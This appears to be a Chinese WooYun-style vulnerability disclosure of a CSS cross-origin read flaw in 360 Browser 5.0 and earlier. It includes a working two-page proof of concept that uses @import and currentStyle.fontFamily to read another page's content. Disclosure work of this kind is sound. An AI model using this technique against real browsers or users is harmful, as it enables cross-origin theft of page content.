360浏览器5.0及以下版本#存在CSS跨域漏洞
虽然不是最新版,但也有很多用户在用- -.360浏览器5.0及以下版本#存在CSS跨域漏洞
下载了360浏览器5.0正式版测试了下- -.
3.0等等也存在同样的漏洞,我就拿5.0开刀吧- -.
构造两个本地的页面:
test.html
<html>
<head>
<title>test</title>
</head>
<body>
{}body{font-family:
WooYun
</body>
</html>
test2.html
<html>
<head>
<title>test2</title>
</head>
<body>
<style>
@import url("C:\Users\Administrator\Desktop\test.html");
</style>
<script>
setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);
</script>
</body>
</html>
用360浏览器5.0访问下test2.html
在test2.html 中通过@import加载了 test.html 为CSS文件,渲染进入当前DOM,同时通过 document.body.currentStyle.fontFamily 访问此内容,问题发生在CSS Parse的过程中,将fontFamily后面的内容当做了value,从而读出了test.html的页面内容
修复方案:
弄补丁吧,呵呵